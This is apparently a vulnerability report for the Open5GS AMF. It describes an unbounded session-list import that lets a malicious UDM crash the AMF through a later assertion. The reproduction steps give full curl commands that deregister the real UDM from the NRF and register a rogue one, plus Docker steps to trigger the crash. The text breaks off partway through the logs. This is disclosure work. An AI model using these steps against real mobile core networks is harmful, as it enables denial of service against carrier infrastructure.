| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
AMF can be driven into a later assertion abort when a malicious UDM returns an
oversized `dnnInfos` list in:
```text
GET /nudm-sdm/v2/{supi}/smf-select-data
```
The import path in `amf_nudm_sdm_handle_provisioned()` copies each
`DnnInfoList` entry into:
```c
ogs_session_t *session = &slice->session[slice->num_of_session];
session->name = ogs_strdup(DnnInfo->dnn);
slice->num_of_session++;
```
at `../src/amf/nudm-handler.c:219-230` with no bound check against
`OGS_MAX_NUM_OF_SESS == 4`.
That means a valid but oversized UDM response can push
`amf_ue->slice[i].num_of_session` far past the fixed per-slice session array
limit. The corrupted imported state later aborts as soon as AMF cleanup reaches
`amf_clear_subscribed_info()`:
```c
ogs_assert(amf_ue->slice[i].num_of_session <= OGS_MAX_NUM_OF_SESS);
```
at `../src/amf/context.c:2763`.
This is distinct from the already documented AMF reports. It is not the
existing `NNRF smfInfo.dnnSmfInfoList` crash family, and it is not the earlier
live `smf-select-data` experiment that only showed `Ignore max session count
overflow` later in `gmm-handler.c`. The root cause here is the unbounded import
in `nudm-handler.c` and the later cleanup-time assertion in `context.c`.
### Root Cause
- Entry chain:
UE registration
-> AMF `GET /nudm-sdm/v2/{supi}/smf-select-data`
-> `amf_nudm_sdm_handle_provisioned()`
-> unbounded `slice->session[slice->num_of_session]` writes
-> later `amf_clear_subscribed_info()`
- Crash site:
`../src/amf/context.c:2763`
- Root cause family:
unbounded imported list length causing later cleanup-time assertion
- Controlling field:
`SmfSelectionSubscriptionData.subscribedSnssaiInfos[*].dnnInfos[*]`
### Steps to Reproduce
1. Start the Open5GS Docker lab and ensure these containers are running:
```bash
docker start db ausf udm udr pcf smf upf amf nssf
```
2. Confirm the subscriber exists in MongoDB. In my live run, the existing test
subscriber was:
```text
IMSI: 001011234567891
```
3. Start the fake UDM helper in the same `open5gs` Docker network. In my live
run on 2026-04-12 the fake UDM container IP was `10.33.33.13`:
```bash
docker run -d --name amf-fake-udm --network open5gs \
-v /home/ubuntu/open5gs_277/.audit_tmp:/work \
node:20-alpine sh -lc '
IP=$(hostname -i | awk "{print \$1}")
export AMF_FAKE_UDM_HOST_IP=$IP AMF_FAKE_UDM_PORT=18083
export AMF_FAKE_UDM_MODE_FILE=/work/amf_fake_udm.mode
export AMF_FAKE_UDM_LOG_FILE=/work/amf_fake_udm.log
node /work/amf_fake_udm.js'
```
4. Control experiment: fresh AMF, replace the AMF-local real UDM entry with the
fake UDM, then perform one normal UE registration:
```bash
docker rm -f amf-audit-gnb amf-audit-ue || true
docker restart amf
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST http://10.33.33.5/nnrf-nfm/v1/nf-status-notify \
-H 'content-type: application/json' \
--data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/28259240-367f-41f1-862a-81de7e8f7ca7"}'
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST http://10.33.33.5/nnrf-nfm/v1/nf-status-notify \
-H 'content-type: application/json' \
--data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.13:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.13"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}'
printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker run --rm -d --name amf-audit-gnb --network open5gs \
--network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run --rm -d --name amf-audit-ue --network open5gs \
--network-alias ue.ueransim.org \
--cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
5. Malicious experiment: fresh AMF again, replace the AMF-local real UDM entry
with the fake UDM, then use `smf-select-dnn-overflow` for two consecutive UE
registrations:
```bash
docker rm -f amf-audit-gnb amf-audit-ue || true
docker restart amf
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST http://10.33.33.5/nnrf-nfm/v1/nf-status-notify \
-H 'content-type: application/json' \
--data '{"event":"NF_DEREGISTERED","nfInstanceUri":"http://nrf.open5gs.org/nnrf-nfm/v1/nf-instances/28259240-367f-41f1-862a-81de7e8f7ca7"}'
curl --http2-prior-knowledge -sS -i -m 8 \
-X POST http://10.33.33.5/nnrf-nfm/v1/nf-status-notify \
-H 'content-type: application/json' \
--data '{"event":"NF_REGISTERED","nfInstanceUri":"http://10.33.33.13:18083/nnrf-nfm/v1/nf-instances/fake-udm-amf","nfProfile":{"nfInstanceId":"fake-udm-amf","nfType":"UDM","nfStatus":"REGISTERED","fqdn":"fake-udm-amf.local","ipv4Addresses":["10.33.33.13"],"allowedNfTypes":["SCP","AMF","SMF","AUSF"],"priority":0,"capacity":100,"load":0,"nfServices":[{"serviceInstanceId":"fake-udm-ueau","serviceName":"nudm-ueau","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AUSF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-uecm","serviceName":"nudm-uecm","versions":[{"apiVersionInUri":"v1","apiFullVersion":"1.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0},{"serviceInstanceId":"fake-udm-sdm","serviceName":"nudm-sdm","versions":[{"apiVersionInUri":"v2","apiFullVersion":"2.0.0"}],"scheme":"http","nfServiceStatus":"REGISTERED","ipEndPoints":[{"ipv4Address":"10.33.33.13","port":18083}],"allowedNfTypes":["AMF","SMF"],"priority":0,"capacity":100,"load":0}]}}'
printf 'smf-select-dnn-overflow\n' > /home/ubuntu/open5gs_277/.audit_tmp/amf_fake_udm.mode
docker run --rm -d --name amf-audit-gnb --network open5gs \
--network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run --rm -d --name amf-audit-ue --network open5gs \
--network-alias ue.ueransim.org \
--cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
# Wait for the first registration to finish and plant the oversized session list,
# then restart gNB/UE once more to trigger the later cleanup-time assertion.
docker rm -f amf-audit-gnb amf-audit-ue || true
docker run --rm -d --name amf-audit-gnb --network open5gs \
--network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run --rm -d --name amf-audit-ue --network open5gs \
--network-alias ue.ueransim.org \
--cap-add NET_ADMIN --device /dev/net/tun:/dev/net/tun \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 50 amf
```
### Logs
Control UE result:
```text
Initial Registration is successful
PDU Session establishment is successful PSI[1]
running 0
```
Malicious AMF logs:
```text
04/12 15:02:24.574: [sbi] INFO: [46046808-3644-41f1-8634-1158ac178bc2] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81)
04/12 15:02:24.574: [sbi] INFO: [NSSF] NFInstance associated [46046808-3644-41f1-8634-1158ac178bc2] (../lib/sbi/context.c:2441)
04/12 15:02:24.574: [sbi] INFO: Setup NF EndPoint(fqdn) [nssf.open5gs.org:0] (../lib/sbi/context.c:2446)
04/12 15:02:24.574: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.9:80] (../lib/sbi/context.c:2446)
04/12 15:02:24.574: [sbi] INFO: [nnssf-nsselection] NFService associated [460520a4-3644-41f1-8634-1158ac178bc2] (../lib/sbi/context.c:2109)
04/12 15:02:24.574: [sbi] INFO: Setup NF EndPoint(fqdn) [nssf.open5gs.org:0] (../lib/sbi/context.c:2111)
04/12 15:02:24.574: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.9:80] (../lib/sbi/context.c:2111)
04/12 15:02:24.575: [sbi] INFO: [5ac5b314-3644-41f1-b7b4-21a7b4c43293] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81)
04/12 15:02:24.575: [sbi] INFO |
|---|